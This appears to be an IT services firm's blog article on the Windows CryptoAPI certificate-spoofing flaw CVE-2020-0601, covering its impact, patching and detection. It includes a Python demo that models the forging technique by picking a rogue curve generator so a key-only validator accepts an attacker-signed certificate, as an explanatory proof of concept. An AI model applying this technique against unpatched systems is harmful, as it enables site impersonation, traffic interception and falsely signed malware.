A recently discovered security bug in Windows 10 is so serious that the National Security Agency itself reported it to Microsoft. If you have any Windows 10 machines that have not installed the security update released on January 14, 2020, run Windows Update now. The bug also affects Windows Server 2016 and 2019.
The bug is in Microsoft's CryptoAPI (crypt32.dll), the component Windows uses to validate X.509 certificates, including the certificates behind HTTPS. It lies in the validation of certificates that use elliptic-curve (ECC) keys. An ECC certificate may spell out its curve parameters explicitly, and the flawed code matched a certificate's issuer against a cached trusted root by the public key alone, without checking that those parameters also matched. An attacker who chooses the parameters can therefore produce a certificate that Windows accepts as if it chained to a trusted root. A malicious public Wi-Fi hotspot could use such a certificate to impersonate a bank or e-commerce site: Windows would show the connection as trusted while the attacker decrypts the traffic in transit, including submitted forms.
The same bug lets a criminal tamper with a downloadable application and attach a forged Authenticode signature, so the file appears to come from a trusted publisher and to be unmodified. Combined with a spoofed download site, that would deliver infected applications without Windows raising any warning.
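To make the flaw concrete, here is an added example (written for this article; it is not Microsoft's code and is not taken from the NSA or CERT notices) that models the vulnerable check and the corrected one in plain Python. It uses textbook affine arithmetic on NIST P-256 and a toy trust store. The root CA key, the attacker's scalar and the leaf certificate body are constructed for the demo, and the "certificate" objects hold only the two fields that matter here: the curve parameters the certificate presents and the issuer's public point. The forged issuer keeps the real root's public key but presents explicit parameters whose generator the attacker chose, so a validator that matches on the public key alone accepts an attacker-signed leaf, while one that also pins the parameters rejects it.

```python
"""CVE-2020-0601 modelled: a validator that trusts an issuer by public key alone
versus one that also pins the curve parameters.  Added example with plain-Python
affine EC arithmetic on P-256, not Microsoft's code.  Needs Python 3.8+."""
import hashlib
import secrets
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Curve:  # y^2 = x^3 + a*x + b over GF(p); g has prime order n
    p: int; a: int; b: int; g: tuple; n: int

# NIST P-256 domain parameters (standard constants).
P256 = Curve(
    p=0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF,
    a=0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC,
    b=0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B,
    g=(0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
       0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5),
    n=0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551)

def ec_add(c, P, Q):
    """Affine point addition; None is the point at infinity."""
    if P is None or Q is None:
        return Q if P is None else P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % c.p == 0:
        return None
    num, den = ((3 * x1 * x1 + c.a), 2 * y1) if P == Q else (y2 - y1, x2 - x1)
    lam = num * pow(den, -1, c.p) % c.p
    x3 = (lam * lam - x1 - x2) % c.p
    return (x3, (lam * (x1 - x3) - y1) % c.p)

def ec_mul(c, k, P):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    R = None
    while k:
        if k & 1:
            R = ec_add(c, R, P)
        P, k = ec_add(c, P, P), k >> 1
    return R

def hash_to_int(c, msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % c.n

def ecdsa_sign(c, d, msg):
    """Textbook ECDSA over the curve's own generator g, with a random nonce."""
    e, k = hash_to_int(c, msg), secrets.randbelow(c.n - 1) + 1
    r = ec_mul(c, k, c.g)[0] % c.n
    return (r, pow(k, -1, c.n) * (e + r * d) % c.n)

def ecdsa_verify(c, Q, msg, sig):
    r, s = sig
    if not (0 < r < c.n and 0 < s < c.n):
        return False
    e, w = hash_to_int(c, msg), pow(s, -1, c.n)
    X = ec_add(c, ec_mul(c, e * w % c.n, c.g), ec_mul(c, r * w % c.n, Q))
    return X is not None and X[0] % c.n == r

@dataclass(frozen=True)
class CaCert:
    curve: Curve   # parameters the certificate presents (named or explicit)
    pubkey: tuple  # the CA's public point Q

def forge_issuer(root, d):
    """Pick g' = d^-1 * Q so that d * g' == Q: under the explicit parameters the
    forged certificate carries, the attacker knows a private key for the real
    root's public key.  This is the heart of the CVE-2020-0601 technique."""
    g_rogue = ec_mul(root.curve, pow(d, -1, root.curve.n), root.pubkey)
    return CaCert(replace(root.curve, g=g_rogue), root.pubkey)

def issuer_is_trusted(issuer, store, strict):
    if strict:  # patched behaviour: public key AND parameters must match a root
        return issuer in store
    return any(issuer.pubkey == r.pubkey for r in store)  # the flaw

def chain_validates(leaf_tbs, leaf_sig, issuer, store, strict):
    """Accept the leaf if its issuer is trusted and the leaf signature verifies
    under the issuer's key, using the parameters the issuer cert carries."""
    return (issuer_is_trusted(issuer, store, strict)
            and ecdsa_verify(issuer.curve, issuer.pubkey, leaf_tbs, leaf_sig))

# Constructed root CA and attacker material: arbitrary scalars, not real keys.
ROOT_PRIV = hash_to_int(P256, b"constructed root CA private key")
ROOT = CaCert(P256, ec_mul(P256, ROOT_PRIV, P256.g))
TRUST_STORE = [ROOT]
ATTACKER_PRIV = 0x1337C0DEBEEFCAFEF00DD00DABCD1234
ROGUE = forge_issuer(ROOT, ATTACKER_PRIV)
LEAF_TBS = b"CN=bank.example, key held by the attacker"  # constructed leaf body
ROGUE_SIG = ecdsa_sign(ROGUE.curve, ATTACKER_PRIV, LEAF_TBS)

if __name__ == "__main__":
    for strict in (False, True):
        print("strict" if strict else "flawed", "validator accepts forged chain:",
              chain_validates(LEAF_TBS, ROGUE_SIG, ROGUE, TRUST_STORE, strict))
```

Run it with Python 3.8 or later (it relies on `pow(x, -1, m)` for modular inverses). In a real X.509 certificate the rogue parameters would sit in the ECParameters field of the SubjectPublicKeyInfo; the lesson is the same either way: a validator must compare the complete key, point plus domain parameters, against the trusted root, or refuse explicitly parameterised curves altogether. Note that the forged signature verifies only under the attacker's parameters; checked under the genuine P-256 generator it fails, which is exactly why pinning the parameters closes the hole.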
The discovery of the bug
This report marks a shift from the NSA's earlier practice of keeping the bugs it found secret so that it could use them for espionage. That practice backfired when one of its stolen exploits was leaked and used to build the WannaCry ransomware. Anne Neuberger, head of the NSA's Cybersecurity Directorate, called its response to this issue a "change in approach" aimed at "building trust."
Because the NSA reported the bug to Microsoft, a patch now closes the vulnerability. Inevitably, though, many systems will not receive the update for a long time, if ever.
The bug is formally known as CVE-2020-0601. The CERT notification provides technical details.
Windows 7 is not affected, which is fortunate, because support for it ended on the same day as the announcement. Even so, any remaining systems running Windows 7 or older, or Windows 8.0 (out of support since 2016), should be moved to Windows 10 as quickly as possible: vulnerabilities discovered in them from now on will not be fixed.
Fixing the problem
The U.S. military and selected private organizations received the patch in confidence before the public announcement. It is now available to all licensed Windows 10 systems.
If you have automatic updates enabled, you should already be in good shape, but it does not hurt to verify that the January update has actually been installed. To check or update manually, open Settings, go to Update & Security, select Windows Update, and click "Check for updates." The January update fixes many other security issues at the same time.
As always, avoid panicked reactions. There will certainly be phishing campaigns offering "security fixes" that are actually malware. Use only the standard update mechanism over a trusted Internet connection.
If you have many systems to update, give priority to endpoints that are exposed directly to the Internet and to servers that validate certificates on behalf of others, such as web servers and TLS-inspecting proxies.
Windows Defender and Microsoft Security Essentials have been updated to detect attempts to exploit the flaw. The patch itself also adds a detection hook: on a patched system, an attempt to use a certificate that exploits the flaw is recorded in the Application event log with source Microsoft-Windows-Audit-CVE and Event ID 1, so those events are worth collecting centrally. Antivirus is not a substitute for an up-to-date system, but having multiple layers of protection is wise.
Keeping up with security updates
Most security issues are not as alarming as this one, but weaknesses in applications and operating systems turn up regularly. It is essential to keep the operating system and every Internet-facing application on your systems current with the latest security patches.
If your business does not have a dedicated IT staff, or if dealing with employee and customer issues takes up all your time, you should consider getting trusted professional assistance for managing your system updates and security issues. We offer managed services and cybersecurity training, letting your staff focus on providing service for your business. Contact us to find out more about how we can help your IT operations.